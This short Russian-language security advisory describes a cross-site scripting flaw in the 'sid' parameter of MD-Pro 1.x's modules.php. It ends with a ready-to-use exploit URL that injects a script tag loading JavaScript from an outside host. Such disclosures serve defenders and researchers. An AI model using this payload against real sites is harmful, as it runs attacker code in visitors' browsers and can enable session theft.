Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: MAXdev MD-Pro 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "sid" сценарием modules.php (когда "op" установлен в "modload",
"name" установлен в "News", и "file" установлен в "article"). Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Эксплоит:
http://host/modules.php?op=modload&name=News&file=article&sid=1%22%3E%3Cscript+src=http://www.htbridge.ch/advisory/1.js+a=